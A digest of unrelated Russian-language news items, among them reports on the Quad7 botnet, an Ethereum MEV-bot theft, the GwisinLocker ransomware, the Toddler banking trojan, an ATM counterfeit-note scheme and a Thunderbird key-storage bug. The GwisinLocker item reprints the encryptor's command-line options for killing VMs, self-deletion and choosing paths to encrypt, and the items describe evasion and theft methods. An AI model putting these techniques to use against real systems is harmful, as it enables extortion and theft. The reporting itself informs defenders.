Доводы подсудимых о том, что они не знали о происхождении денежных средств, поступивших 3 июня 2022 г. от пользователя «D...28» на счет О., о том, что А. решил помочь другу в оформлении карты, подыскав О., не опровергнуты. Напротив, отметил суд, подписывая пользовательское соглашение, А. согласился с его условиями, согласно которым пользователь не может использовать контент или услуги биржи в каких-либо незаконных целях или иных, не упомянутых в условиях, использовать услуги биржи от имени или в интересах какой-либо третьей стороны каким-либо образом.
Димитровградский городской суд Ульяновской области пришел к выводу, что ни одно из доказательств стороны обвинения не подтверждает умышленное пособничество Б. и А. в совершении мошенничества, и оправдал их в связи с отсутствием в их действиях состава преступления с правом на реабилитацию.
В комментарии «АГ» защитник Б. Роман Гончаров поделился, что самым сложным было донести до суда, как работает криптоплатформа и что такое р2p-арбитраж. «На стадии предварительного следствия все ходатайства стороны защиты о получении информации от Garantex отсекались следователем. Адвокату было сложно получить информацию самостоятельно, поскольку криптоплатформы ведут такую политику, что отвечают на запросы лишь правоохранительным органам и судам. Впоследствии сторона защиты все же смогла самостоятельно получить запрашиваемую информацию, но уже на стадии рассмотрения дела судом, – рассказал он. − Были получены документы, подтверждающие “чистоту” сделок, осуществляемых моим подзащитным, а также пользовательское соглашение, обязательное для каждого пользователя при регистрации, в редакции, действующей на момент сделки с недобросовестным покупателем. Данные документы были тщательно проанализированы стороной защиты, и суть их была передана суду (помимо самих документов) простым для понимания языком. Были допрошены свидетели стороны защиты, которые подробно и ясно дали понять не одному судье (дело слушалось в суде три раза) о том, что у продавца криптовалюты нет обязанности выяснять у покупателя законность происхождения денег, которыми покупатель расплачивается за крипту».
Роман Гончаров отметил, что изначально линия защиты строилась на основе отсутствия умысла у подзащитных на пособничество в совершении мошенничества. «Именно совокупность представленных суду доказательств стороны защиты подчеркнула довод о том, что у оправданных отсутствовал умысел на совершение преступления», − заключил он.
Его коллега, защитник А. Асим Алыев назвал приговор более чем справедливым: «Он соответствует как установленным в ходе расследования уголовного дела обстоятельствам произошедших событий, так и изученным в ходе судебного разбирательства материалам. Принятое решение о невиновности наших подзащитных еще раз доказывает, что принцип состязательности сторон существует и успешно применяется на практике, особенно если ты уверен в своей правоте», – указал он.
Асим Алыев отметил, что в России активно развивается криптоиндустрия и множество молодых людей не подозревают о том, что могут оказаться у следователя в кабинете, а потом и на скамье подсудимых. «К сожалению, следователи, допрашивая граждан без адвоката, пытаются “подловить” их, найти какие-то фразы в допросе, которые могут быть просто-напросто вырваны из контекста, и на этом построить обвинение. Человек, будучи не сильно подкованным в тонкостях юриспруденции, а также испытывая на себе психологическое давление, “ведется” на такие не совсем корректные приемы следователя, тем самым причиняя вред себе и своему будущему», – указал адвокат.
Асим Алыев полагает, что правоохранительным и судебным органам необходимо более внимательно подходить к расследованию преступлений, а особенно к сбору доказательств. Кроме того, ими неукоснительно должна соблюдаться ст. 14 УПК – презумпция невиновности, согласно которой бремя доказывания лежит на стороне обвинения, все сомнения в виновности толкуются в пользу обвиняемого, а приговор не может быть основан на предположениях.
«В завершение хочется сказать, что для меня как адвоката очень важны престиж нашей профессии, а также вера граждан в то, что адвокат действительно нужен и он может помочь. Такие приговоры лучше чем что-либо способствуют формированию достойного уровня доверия населения к институту адвокатуры, а также, несомненно, повышают престиж нашей благородной профессии», – резюмировал он.
advgazeta.ru/novosti/advokaty-dobilis-opravdaniya-prodavtsa-kriptovalyuty-i- ego-druga-obvinyavshikhsya-v-posobnichestve-moshennikam
Sekoia представила [отчет](https://blog.sekoia.io/a-glimpse-into-the- quad7-operators-next-moves-and-associated-botnets/) в отношении ботнетаQuad7, который активно эволюционирует, атакуя с помощью нового вредоносного ПО для VPN-устройствZyxel, беспроводных маршрутизаторовRuckus и медиасерверовAxentra.
Замеченные новшества в работеQuad7 показывает, что его разработчики учли имевшиеся ошибки, выявленные исседователями, и теперь реализуют переход в сторону более скрытных технологий.
Основная цельQuad7 остается до сих загадкой, есть лишь предположения о возможности его задействования в бруте паролей наVPN, Telnet, SSH и учетных записей Microsoft 365.
БотнетQuad7 состоит из нескольких подкластеров, идентифицированных как варианты *login, каждый из которых нацелен на определенные устройства и отображает свой приветственный баннер при подключении к порту Telnet.
Полный список вредоносных кластеров состоит из:
-xlogin – Telnet, привязанный к TCP-порту 7777 на маршрутизаторахTP-Link
-alogin – Telnet привязан к TCP-порту 63256 на маршрутизаторахASUS
-rlogin – Telnet, привязанный к TCP-порту 63210 на беспроводных устройствахRuckus
-axlogin – баннер Telnet на устройствахAxentra NAS
-zylogin – Telnet, привязанный к TCP-порту 3256 на устройствахZyxel VPN.
Некоторые из кластеров, такие какxlogin и alogin затрагивают до нескольких тысяч устройств. Другие, недавно появившиеся, такие какrlogin и zylogin, насчитывают значительно меньше - 298 и 2 заражения соответственно, а axlogin - вовсе по нулям.
Тем не менее, эти новые подкластеры в самое ближайшее время могут выйти из экспериментальной фазы или переключиться на новые уязвимости, нацеленные на более распространенные модели.
Последние результаты исследованияSekoia показывают, что ботнетQuad7 значительно усовершенствовал свои методы и тактику коммуникации, сосредоточившись на уклонении от обнаружения и повышении эффективности работы.
Во-первых, постепенно прекращается использование открытых прокси-серверов SOCKS, в которых ботнет активно использовал предыдущие версии для ретрансляции вредоносного трафика.
Вместо этого операторыQuad7 теперь используют протокол связиKCP для ретрансляции атак с помощью инструментаFsyNet, который осуществляет связь по протоколу UDP, что значительно затрудняет отслеживание.
Кроме того, злоумышленники теперь используют новый бэкдор под названиемUPDTAE, который устанавливает обратные HTTP-оболочки для удаленного управления зараженными устройствами, позволяя операторам управлять устройствами, не раскрывая интерфейсы входа в систему и не оставляя открытыми порты.
Также разработчиками ведутся эксперименты с новым двоичным файломnetd, который использует протоколCJD route2, так что, скорее всего, на подходе еще более скрытый механизм связи.
За последние два года язык программирования Rust продемонстрировал беспрецедентные темпы роста, и количество разработчиков, использующих этот язык, удвоилось. Тем не менее, согласно недавнему опросу, JavaScript сохраняет лидирующие позиции и остается самым популярным языком программирования, насчитывая 25,2 миллиона активных разработчиков по всему миру. Стремительный рост Rust свидетельствует о растущем интересе к языкам, обладающим высокой производительностью и надежными механизмами управления памятью, в то время как JavaScript по-прежнему доминирует в веб-разработке и других областях.
Согласно 26-му изданию [опроса SlashData’s Developer Nation](https://ahdt- zgph.maillist-manage.net/click/1a0d1fba490228f1/1a0d1fba4901e6a9), сообщество Rust увеличилось с двух миллионов в первом квартале 2022 года до четырех миллионов в первом квартале 2024 года. За последние 12 месяцев рост составил 33%. Отчет SlashData охватывает первый квартал 2024 года.
Язык программирования Rust вызвал восторженный отклик у активного сообщества разработчиков, которые высоко ценят его за обеспечение безопасности управления памятью при сохранении высокой производительности. Однако растущие опасения, связанные с кибербезопасностью, могут способствовать еще более широкому распространению этого языка. Согласно отчету, за последние полгода США и их международные партнеры активно выступали в поддержку перехода на языки программирования с безопасным управлением памятью, подобные Rust.
Хотя возможность обеспечивать безопасность управления памятью не является уникальной особенностью Rust, сочетание высокой производительности и встроенных механизмов защиты от ошибок, связанных с памятью, вероятно, привлечет к этому языку программирования все большее число разработчиков, согласно прогнозам отчета.
"Недавние усилия по продвижению и исследованиям со стороны таких агентств, как NSA, CISA, NIST и ONCD, могут служить ценными доказательствами значительного риска уязвимостей безопасности памяти для нашей цифровой экосистемы," — заявила Ребекка Румбул, исполнительный директор и CEO Фонда Rust. "Фонд Rust считает, что язык программирования Rust является самым мощным инструментом для устранения критических пробелов в инфраструктурной безопасности. Мы твердо привержены укреплению безопасности Rust через такие программы, как наша Инициатива по безопасности."
JavaScript продолжает лидировать среди языков программирования с более чем 25 миллионами активных разработчиков по всему миру. Согласно отчету, "доминирующая позиция JavaScript вряд ли изменится в ближайшее время, его сообщество разработчиков увеличилось на 4 миллиона за последние 12 месяцев, что соответствует темпам роста глобального сообщества разработчиков."
Одним из ключевых факторов, обеспечивающих мощь сообщества разработчиков JavaScript, является чрезвычайно широкое применение этого языка во всевозможных типах проектов. Согласно данным, не менее 25% разработчиков используют JavaScript в самых разных областях, начиная от веб-разработки и заканчивая Интернетом вещей (IoT). Такая универсальность JavaScript позволяет ему оставаться лидером среди языков программирования и формировать обширное и активное сообщество разработчиков по всему миру.
Python и Java также демонстрируют сильные позиции, при этом Python обогнал Java как второй по популярности язык, что связано с интересом к машинному обучению и ИИ. В первом квартале 2024 года у Python было 18,2 миллиона разработчиков против 17,7 миллиона у Java.
Несмотря на потерю второго места, Java сохраняет статус одного из самых популярных языков программирования уже почти три десятилетия. Согласно отчету, в последнее время наблюдается рост использования Java среди разработчиков серверных сервисов и веб-приложений. При этом доля разработчиков, создающих мобильные приложения на Java, осталась неизменной, а доля разработчиков настольных приложений на этом языке несколько сократилась. Тем не менее, благодаря своей универсальности и обширному наследию Java продолжает оставаться одним из основных языков программирования в индустрии.
Следующим по популярности идет C++ с 11,4 миллионами разработчиков, за ним следуют C# с 10,2 миллионами и PHP с 9,8 миллионами. Наименьшие сообщества имеют Objective-C с 2,7 миллионами, Ruby с 2,5 миллионами и Lua с 1,8 миллионами разработчиков.
Язык Go продемонстрировал рост сообщества разработчиков на 10% за последний год, увеличившись с трех миллионов в первом квартале 2022 года до 4,7 миллиона в первом квартале 2024 года. Отчет отмечает, что "Go является привлекательным языком благодаря своим производственным возможностям, упрощению параллелизма и легкости чтения."
В отличие от роста языков, таких как Rust, Objective-C стагнировал последние два года, сохраняя около 2,5 миллиона разработчиков. Apple продолжает поддерживать Objective-C, однако Swift стал основным языком для всех платформ Apple, увеличив сообщество до 4,6 миллиона разработчиков за последние 12 месяцев.
SlashData оценивает, что в первом квартале 2024 года в мире насчитывается 43 миллиона активных разработчиков программного обеспечения. В опросе Developer Nation участвовало более 10,000 респондентов из 135 стран.
Аналитик TNS Лоуренс Хехт отметил, что за исключением Rust, Go и JavaScript, другие крупные языки программирования росли медленнее, чем общее количество разработчиков, увеличившееся на 39% за последние два года.
В результате атаки на блокчейн Эфириума злоумышленник заменил обычные MEV- транзакции ботов вредоносными и украл более $25 млн.
Опираясь на данные обозревателя блокчейнов Еtherscan, представитель маркетмейкера Wintermute Джозеф Плаза (Joseph Plaza) предположил, что хакер создал транзакции-приманки, чтобы заманить ботов MEV.
Затем злоумышленник заменил первоначальные транзакции-приманки новыми, вредоносными, что позволило украсть средства. Чтобы подготовиться к атаке, преступник за 18 дней до инцидента внес в пул стейкинга Эфириума 32 ETH и стал валидатором.
Плаза добавил, что, вероятно, злоумышленник, дождался своей очереди предложить блок в качестве валидатора, что и стало началом атаки. Впоследствии он реорганизовал содержимое блока и создал новый блок, содержащий злонамеренные транзакции для кражи активов.
В результате «валидатор-хакер» смог украсть 7 461 WETH ($13,4 млн), 5,3 млн USDC, 3 млн USDT и 65 WBTC ($1,8 млн)
Первым об инциденте сообщил в Твиттере разработчик смарт-контрактов под псевдонимом 3155.eth. Впоследствии эксперты компании PeckShield смогли отследить украденные активы до трех адресов Эфириума, объединенных с восемью другими адресами.
Команда разработчика основного программного обеспечения блокчейна Эфириума MEV-Boost заявила о внесении экстренных исправлений, чтобы предотвратить подобные инциденты в будущем.
В частности, в MEV-Boost была добавлена функция, которая инструктирует ретрансляторов публиковать подписанный блок перед передачей содержимого. Это позволит снизить вероятность того, что злоумышленник предложит в MEV-Boost блок, который отличается от того, что он получил от ретранслятора.
В Москве арестованы три человека, обвиняемые в продаже личных данных людей через даркнет.
Правоохранители задержали в Москве троих мужчин по обвинению в том, что те за деньги осуществляли поиск личных данных частных лиц.
Как сообщается, задержанные невольно помогли в расследованиях основателю ФБК Алексею Навальному (ФБК включен Минюстом в реестр организаций, выполняющих функции иностранного агента, и признан экстремистской организацией), сообщает ТАСС, ссылаясь на источник в правоохранительных органах.
По его данным, задержаны Петр Катков, Александр Зеленцов и Игорь Зайцев. С помощью теневого интернета искали клиентов и продавали им личные данные различных граждан: телефоны, адреса и прочее. Для этого они использовали поддельные документы, в том числе, удостоверениями сотрудников полиции.
Задержанным предъявлены обвинения в подделке документов и нарушении тайны телефонных переговоров. По решению Басманного суда подозреваемые отправлены под домашний арест из-за расследования по статье 327 и 138 УК РФ.
Vivaldi Technologies представила новую версию своего браузера — Vivaldi 3.8 (настольных ПК и Android). Основные изменения касаются безопасности и удобства работы. Так, в браузере заблокировали технологию Google FLoC, а также внедрили собственную разработку Cookie Crumbler, которая помогает избежать надоедливых предупреждений о файлах cookie.
В версии 3.8 отключена технология Federated Learning of Cohorts (FLoC), созданная Google и призванная заменить собой сторонние файлы cookie. FLoC анализирует поведение каждого пользователя и относит его к определенной «когорте», группе — например, при поиске лекарств. При этом информация об интересах и поведении, предполагаемом возрасте и чертах характера пользователя становится доступна любому сайту, а Google получает возможность детально анализировать данные всех «когорт».
«Зачастую пользователи автоматически принимают файлы Cookie, не понимая того, что тем самым они дают разрешение на сбор информации о себе, — говорит Йон фон Течнер, основатель Vivaldi Technologies. — Некоторые веб-сайты не работают без файлов cookie, что ставит пользователей в безвыходное положение. Я считаю, что эта система сбора пользовательских данных должна быть наконец упразднена. Ни у кого нет права собирать о вас информацию с Вашим и, тем более, без Вашего разрешения».
Click to expand...
Как мы уже писали ранее, сама технология FLoC и идея заменить ею сторонние файлы cookie, не нашла поддержки в отрасли. Технологию Google критикуют и отказываются использовать многие крупные игроки, включая EFF, Microsoft, Mozilla Firefox, Brave, WordPress и DuckDuckGo:
Кроме того, в обновленной версии Vivaldi появился Cookie Crumbler — функция, которая позволяет один раз настроить работу браузера с файлами cookie, а бороться с раздражающими окнами по отдельности на каждом сайте. Дело в том, что согласно постановлению GDPR (Общий регламент по защите данных), сайты, которые используют файлы cookie, должны предупреждать об этом своих пользователей.

Изначально регламент был создан для защиты личных данных пользователей, однако это привело к появлению сообщений и всплывающих окон, в которых нужно отметить, какие типы данных можно собирать. Это существенно замедляет работу в интернете и раздражает пользователей, говорят разработчики Vivaldi, поэтому возможность настроить браузер так, чтобы он делал это самостоятельно, очень пригодится.
Другие изменения в новой версии затронули интерфейс и работу с закладками. Панели, по умолчанию расположенные в левой части окна браузера, научились менять прозрачность. Изображение, которое проступает из-под прозрачных панелей, тоже можно выбрать. Вместе с этим в настройках тем оформления появились эффект размытия, настройка контраста и еще несколько возможностей.
Источник: xakep.ru/2021/04/30/vivaldi-3-8/
Новое семейство программ-вымогателей хитрым способом шифрует все данные на серверах Windows и Linux.
Новое семейство программ-вымогателей под названием GwisinLocker нацелено на южнокорейские медицинские, промышленные и фармацевтические компании с помощью шифраторов Windows и Linux, включая технологию шифрования серверов и виртуальных машин VMware ESXi. Новое вредоносное ПО разработал малоизвестный хакер по имени Gwisin, что в переводе с корейского означает «призрак».
Корейские эксперты по кибербезопасности из Ahnlab опубликовали отчет о шифровальщике Windows, а исследователи безопасности из ReversingLabs выпустили технический анализ версии для Linux.
При шифровании устройства Windows заражение начинается с выполнения установочного MSI-файла, который требует специальных аргументов командной строки для правильной загрузки встроенной DLL-библиотеки. DLL действует как шифровальщик программы-вымогателя. Требование аргументов командной строки усложняет анализ программы специалистами.
Когда предоставлены правильные аргументы командной строки, MSI расшифровывает и внедряет свою внутреннюю DLL-библиотеку (программу-вымогатель) в процесс Windows, чтобы избежать обнаружения антивирусным ПО. Иногда аргумент может установить программу для работы в безопасном режиме. В этом случае программа копируется в папку ProgramData и регистрируется как служба.
Для версии Linux GwisinLocker ориентирован на шифрование виртуальных машин VMware ESXi, включая 2 аргумента командной строки, которые управляют тем, как вредоносное ПО будет шифровать виртуальные машины. Аргументы также включают «–vm», который перечисляет виртуальные машины и останавливает их работу. Аргументы командной строки для шифровальщика Linux перечислены ниже:
Usage: Usage
-h, --help show this help message and exit (Показывает сообщение справки и завершает работу);
Options
-p, --vp= Comma-separated list of paths to encrypt (Разделенный запятыми список путей для шифрования);
-m, --vm= Kills VM processes if 1; Stops services and processes if 2 (Убивает процессы виртуальной машины, если 1; Останавливает службы и процессы, если 2);
-s, --vs= Seconds to sleep before execution (…секунд до сна перед выполнением);
-z, --sf= Skip encrypting ESXi-related files (those excluded in the configuration) (Пропустить шифрование файлов, связанных с ESXi (исключенных в конфигурации);
-d, --sd= Self-delete after completion (Самоудаление после завершения);
-y, --pd= Writes the specified text to a file of the same name (Записывает указанный текст в файл с тем же именем);
-t, --tb= Enters loop if Unix time is (Входит в цикл, если время Unix равно…)
А чтобы сервер Linux не стал непригодным для использования, GwisinLocker исключает из шифрования некоторые каталоги, в том числе «bin», «boot», «dev», «etc» и т.д.
Программа-вымогатель также исключает определенные файлы, связанные с VMware ESXi (state.tgz, useropts.gz, jumpstrt.gz и т. д.), чтобы сервер не загружался. По итогу GwisinLocker завершает работу нескольких демонов Linux перед запуском процесса шифрования, чтобы сделать их данные доступными для блокировки. Шифровальщик использует AES-шифрование с хешированием SHA256.
Все шифраторы включают название компании в записке с требованием выкупа и используют уникальное расширение для зашифрованных имен файлов. Для одной выявленной жертвы хакер в примечании о выкупе описал украденные файлы для доказательства компрометации. Записка с требованием выкупа называется «!!!HOW_TO_UNLOCK[company_name]FILES!!!.TXT» и предупреждает жертву не обращаться в правоохранительные органы Южной Кореи или KISA (Корейское агентство Интернета и безопасности).

Киберпреступник предложил жертве посетить onion-адрес с помощью браузера Tor, войти в систему с предоставленными хакером учетными данными и следовать инструкциям по оплате выкупа и восстановлению файлов.
source: asec.ahnlab.com/en/37483 | blog.reversinglabs.com/blog/gwisinlocker-ransomware-targets-south-korean-industrial-and-pharmaceutical-companies
В деле о краже рекомендовано найти обнальщиков.
Как стало известно “Ъ”, Советский райсуд Красноярска не стал выносить приговор четверым обвиняемым, заложившим в банкоматы местного отделения ПАО «Сбербанк» «билеты банка "Сувенир"» на сумму почти 3 млн руб. Суд не согласился с принятой следствием квалификацией преступления. По его мнению, подсудимые только пытались совершить инкриминированную им особо крупную кражу (ч. 4 ст. 158 УК РФ), но реально похитили деньги все же не они, а их так и не установленные следствием подельники, обналичившие красноярские вклады в Кургане. Следствию было рекомендовано либо найти обнальщиков и привлекать к ответственности всю группу, либо признать, что «вкладчики» были в ней на вторых ролях.
Разбирательство по этому делу шло в Советском райсуде полтора года, а когда стороны выступили наконец в прениях, выяснилось, что к общему мнению они так и не пришли. Представитель краевой прокуратуры посчитал вину подсудимых доказанной и запросил для них сроки от трех до трех с половиной лет лишения свободы. Защитники в очередной раз попытались убедить суд в том, что их доверители вообще не были причастны к особо крупной краже (ч. 4 ст. 158 УК РФ), в которой их обвиняют. Как рассказал “Ъ” один из подсудимых, после того, как председательствующая на процессе Ирина Пиго взяла тайм-аут для обдумывания решения, все они приготовились к получению реальных сроков. Подсудимые считали, что сразу после вынесения приговора их могут взять под стражу, поэтому приехали на заседание с собранными сумками и в сопровождении близких родственников. Однако решение судьи Пиго оказалось неожиданным для всех без исключения участников процесса.
Процитировав собравшимся нормы УПК РФ, «Конвенции о защите прав человека и
основных свобод», а также выдержки из решений ЕСПЧ, судья пояснила, что ее
решение должно быть законным, обоснованным и справедливым. Однако, по словам
госпожи Пиго, «выслушав участников процесса и исследовав собранные по делу
доказательства», она пришла к выводу о том, что объективно оценить ситуацию не
может, поскольку обвинительное заключение составлено с нарушениями, серьезно
ущемляющими права подсудимых на защиту.
По мнению суда, они не были «полно и подробно уведомлены о составе вменяемого
преступления» и, соответственно, не имели возможности подготовиться к защите.
Это обстоятельство, как заявила госпожа Пиго, не позволяет ей вынести приговор, соответствующий требованиям российского и международного законодательства, поэтому она решила вернуть материалы дела прокурору для устранения возникших препятствий. Всем четверым обвиняемым судья продлила избранную им ранее меру пресечения в виде подписки о невыезде и надлежащем поведении.
Стоит отметить, что, принимая свое решение, Советский райсуд, по сути, принял доводы самих обвиняемых и их защитников, которые согласились с обвинением, но полтора года пытались оспорить принятую следствием квалификацию совершенных преступлений. Напомним, согласно обвинительному заключению управления Следственного комитета России (СКР) по Красноярскому краю, кража средств краевого отделения ПАО «Сбербанк России» была совершена 12 октября 2018 года. В этот день красноярские студенты Игорь Сергеев и Илья Генвальд вместе с прилетевшими из Москвы таксистом Арсеном Цатиняном и спортсменом Туралом Нанаджанлы заложили в городские банкоматы 548 «билетов банка "Сувенир"» достоинством «5 тыс. дублей» каждый. Неустановленные организаторы аферы заранее доработали фальшивки, наклеив на них имитацию защитной магнитной полосы, поэтому городские банкоматы приняли все «дубли». Опять же неустановленные сообщники предполагаемых расхитителей в тот же день обнулили большую часть условно пополненных счетов, сняв рубли в банкоматах расположенного в тысячах километров от Красноярска Кургана. Тремя неделями позже похожую махинацию, но уже в одиночку, решил совершить студент Сергеев. Он заложил на счет припрятанные ранее 26 «пятитысячных» билетов, тут же снял 130 тыс. руб. и вскоре был задержан, поскольку к этому времени городские банкоматы находились под усиленным контролем. Господин Сергеев сразу же раскаялся и дал показания, благодаря которым следствию вскоре удалось задержать троих его предполагаемых подельников.
Представитель потерпевшей стороны, сотрудник управления безопасности Красноярского отделения Сбербанка Татьяна Боровых сообщила суду, что «с момента зачисления средств на счет клиент получает возможность беспрепятственно распоряжаться ими». Поскольку из банкоматов было изъято всего 574 фальшивые пятитысячные купюры, госпожа Боровых отметила, что дебиторская задолженность банка и, соответственно, нанесенный ему ущерб составил 2 млн 870 тыс. руб.
Следствие согласилось с ней, однако разделило совершенные кражи на групповую,
совершенную в особо крупном размере всеми четырьмя подсудимыми (ч. 4 ст. 158
УК РФ), и «индивидуальную», совершенную уже в крупном размере персонально
Игорем Сергеевым (ч. 3 ст. 158 УК РФ). При этом данные следствия и потерпевшей
стороны относительно ущерба тоже не сошлись.
СКР счел кражей не все заложенные «дубли», а лишь ту их часть, которую успели
обналичить неизвестные сообщники «вкладчиков»,— 2 млн 295 тыс. руб. Еще 130
тыс. руб., по версии следствия, украл у банка лично господин Сергеев.
Последнее обвинение, вероятно, и послужило главным основанием для возврата
дела.
Судья Ирина Пиго спросила у представителя прокуратуры, почему обвинение в «групповой» краже все четверо фигурантов получили за одно лишь внесение «дублей» в банкоматы, а Игорь Сергеев был обвинен в аналогичном преступлении дважды. По версии следствия, он сначала украл 130 тыс. руб., когда внес фальшивки, а потом похитил эту же сумму, сняв настоящие рубли. «Если следствие считает все зачисленные на депозитный счет средства уже украденными, то Сергеев не мог похитить их вторично, он лишь распорядился уже украденным,— пояснила председательствующая.— Если же для совершения кражи нужно все-таки изъять деньги или перевести их на другой счет, то всю сумму внесенных в банкоматы "дублей" следует расценивать не как хищение, а как покушение на кражу»,— пояснила судья. «Где логика?» — задала она риторический вопрос. За отведенное на исправление ошибок время судья порекомендовала прокуратуре определиться с квалификацией обвинений, а заодно согласовать с потерпевшей стороной и назвать точную сумму нанесенного ущерба.
Красноярская прокуратура и местное отделение Сбербанка с выводами суда не согласились. Стороны подали соответственно апелляционные представление и жалобу в краевой суд, в которой назвали постановление райсуда необоснованным и незаконным. По мнению авторов обращений, после внесения «дублей» в банкоматы участники группы «получили возможность распоряжаться деньгами по своему усмотрению», следовательно, похитили их. Кто, где и при каких обстоятельствах обналичил эти средства, как отметили в прокуратуре, «не имело существенного значения для рассматриваемого дела».
В свою очередь, адвокат Турала Нанаджанлы Магамед Исмаилов заявил “Ъ”, что с
самого начала настаивал на переквалификации предъявленных обвинений и с
решением суда полностью согласен. «Мой подзащитный и остальные подсудимые не
имели никакой возможности распоряжаться украденными деньгами и даже не
пытались делать это,— пояснил защитник.— За свое участие в афере Турал
Нанаджанлы получил от неустановленных организаторов всего 45 тыс. руб.,
которые разделил с двумя другими фигурантами. Таким образом, его действия
можно квалифицировать только как покушение на кражу».
По мнению защитника, теперь красноярскому прокурору предстоит разобраться не
только с квалификацией и ущербом по делу, но также оценить качество и полноту
проведенного расследования в целом.
«Ведь к ответственности были привлечены только исполнители, нанятые на разовую акцию за весьма скромное вознаграждение,— заявил адвокат Исмаилов.— Людей, организовавших махинацию в Красноярске и присвоивших похищенные средства, следствию не удалось даже установить».
Напомним, по данным обвиняемых, закладкой «дублей» в банкоматы командовали четверо специально прилетевших из Москвы молодых людей, известных исполнителям и следствию только по именам — Аслан, Рашид, Гарик и некий Этто. Они выдали «вкладчикам» билеты, банковские карты для пополнения счетов и расплатились с ними вечером 12 октября 2018 года. Найти распорядителей акции не удалось, поэтому уголовное дело в их отношении было выделено в отдельное производство. При этом близкий к расследованию источник “Ъ” пояснил, что и эти люди являются лишь структурным подразделением крупной группировки банковских мошенников, возглавляемой выходцами из Грузии. По его данным, входящие в нее специалисты в области IT-технологий постоянно изучают имеющиеся в их распоряжении образцы банкоматов и разрабатывают методику их обмана. После электронного взлома образца лидеры организации заказывают изготовление партии фальшивых купюр и направляют группу для реализации фальшивок в одном из городов. По данным собеседника “Ъ”, представители группировки уже организовывали «набеги» на банкоматы разных кредитных организаций в Москве, Санкт-Петербурге, Ярославле, Хабаровске, Кургане и других российских городах.
Команда исследователей в области кибербезопасности PRODAFT Threat Intelligence (PTI) рассказала о банковском трояне Toddler (также известном как TeaBot/Anatsa) для мобильных устройств под управлением Android. Операторы Toddler использовали вредонос для осуществления атак на клиентов 60 европейских банков в Испании, Германии, Швейцарии и Нидерландах.
По данным PTI, в настоящее время в Испании трояном Toddler заражено не менее 7632 мобильных устройств. В результате взлома C&C-сервера банковского трояна исследователи обнаружили более 1 тыс. украденных учетных данных online- банкинга. В настоящее время троян не был обнаружен в магазине приложений Google Play Store, однако злоумышленники взломали ряд легитимных web-сайтов с целью распространения вредоносного ПО.
Toddler является обычным троянским программным обеспечением во многих отношениях и содержит функции для кражи данных (включая банковские реквизиты), запуска кейлоггеров, создания снимков экрана, перехвата кодов двухфакторной аутентификации (2FA), перехвата SMS, и подключения к C&C-серверу для передачи информации и получения команд.
Вредоносное ПО способно отображать поддельные экраны авторизации и обманом заставить пользователя ввести банковские реквизиты. Для осуществления данных задач вредонос сперва анализирует, какие легитимные приложения открываются на мобильном устройстве. Toddler также позволяет операторам похищать учетные данные для доступа к криптовалютным кошелькам.
Список команд C&C-сервера включает активацию экрана зараженного устройства, запрос разрешений, изменение уровня громкости, попытку получить коды из Google Authenticator и удаление приложений.
Как отметили эксперты, Toddler содержит несколько механизмов персистентности, наиболее заметным из которых является предотвращение перезагрузки зараженного устройства или использование телефона в безопасном режиме.
• Source: https://www.prodaft.com/m/reports/Toddler___TLPWHITE_V2.pdf
"В ходе операции, проходившей в Литве, Швеции, Соединенном Королевстве, задержано пять человек, все - граждане Литвы. По предварительным данным, причиненный ущерб достигает полутора миллионов евро", - сказал на пресс- конференции начальник Комиссариата полиции Вильнюсского уезда Саулюс Гагас.
Более 500 000 евро было заморожено в Литве, еще более 700 000 евро было заморожено в других странах.
По данным правоохраны, старший подозреваемый - 1951 года рождения, младший - 1978 года. Двое из них ранее были судимы в Литве и Швеции, однако не были связаны с организованной преступностью.
По словам Гагаса, от мошенников пострадали граждане Германии, представители академического сообщества, которые искали способы вложить деньги. Сами подозреваемые активно своих жертв не искали и их не уговаривали.
"У нас 38 пострадавших, их может быть и больше (...)", - сказал представитель полиции.
"Они нашли информацию об инвестиционной платформе, сами обратились, сами присылали просьбы, проявляли активность и переводили деньги", - сказал он.
По словам Гагаса, пострадавшие думали, что от их имени открываются банковские счета и что деньги на них находятся в безопасности, хотя на самом деле деньги переводились предприятиям, часть которых была зарегистрирована в Литве, а с них - в другие страны, где деньги обналичивались.
"Реализованная схема мошенничества - новая и исключительно прибыльная: установлено, что применявшаяся ими схема мошенничества представляет собой мутировавшую форму инвестиционного мошенничества, то есть мошенничество по вкладам, главная цель которого - усыпить бдительность клиентов на период от полугода до трех лет, чтобы в этот период, воспользовавшись возможностью, не только замести следы преступной деятельности, но и исчезнуть самим организаторами", - сказал начальник полиции Вильнюсского уезда.
Расследование было начато в феврале после получения информации от одного из литовских банков. Были установлены операции, в которых участвовали предприятия и граждане Литвы. Часть полученных преступным путем средств была обналичена в Швеции. Деньги из Литвы банковскими переводами также отправлялись в Грецию, Венгрию, Турцию, Испанию и Ирландию.
"В этом расследовании фигурирует восемь стран: это страны, через которые переводились деньги, и страны, в которых совершалась преступная деятельность",
Международная операция проходила 4-12 марта, проведено 26 обысков.
Задержанным предъявлены подозрения в мошенничестве и легализации имущества, приобретенного преступным путем.
Исследователь обнаружил, что несколько месяцев Mozilla Thunderbird сохранял ключи OpenPGP некоторых пользователей в формате простого текста. Так, недавно пользователи Thunderbird осознали, что при открытии программы они могут просматривать электронные письма, зашифрованные OpenPGP, без ввода своих мастер-паролей. Такие сообщения в Thunderbird должны быть доступны для просмотра только после аутентификации.
Уязвимость получила идентификатор CVE-2021-29956 и низкий уровень серьезности. Баг затрагивал почтовый клиент всех версий между 78.8.1 и 78.10.1. Он позволял локальному злоумышленнику видеть импортированные ключи OpenPGP, сохраненные на устройствах пользователей, без шифрования. Таким образом, атакующий мог просмотреть и скопировать чужие ключи, а затем выдать себя за отправителя защищенных электронных писем.
Сопровождающий Thunderbird Кай Энгерт (Kai Engert) признает, что это была его личная ошибка, возникшая из-за недостатка тестирования. Дело в том, что несколько месяцев назад процессы обработки ключей были переписаны с целью улучшения их безопасности. Ранее процесс обработки недавно импортированных ключей OpenPGP в Thunderbird выглядел так:
Но, по словам Энгерта, после внесения изменений в код, получилось следующее (шаги 3 и 4 поменялись местами):
«Автор кода (то есть я) и рецензент предположили, что это будет равнозначно [прошлому варианту], — говорит Энгерт. — Но наше предположение, что защита секретного ключа в шаге 3 будет сохранена при копировании его в другую область… оказалось ложным».
Click to expand...
Фактически, когда ключ копировался в постоянное хранилище, защита не копировалась вместе с ним из-за бага в библиотеке RNP, которая используется в Thunderbird и браузере Mozilla Firefox для защиты ключей OpenPGP.
В Thunderbird версии 78.10.2 баг был исправлен, и теперь почтовый клиент будет проверять наличие незащищенных ключей в secring.gpg. Если такие ключи будут найдены, они будут преобразованы в защищенные.
Источник: xakep.ru/2021/05/25/thunderbird-open-pgp-bug/
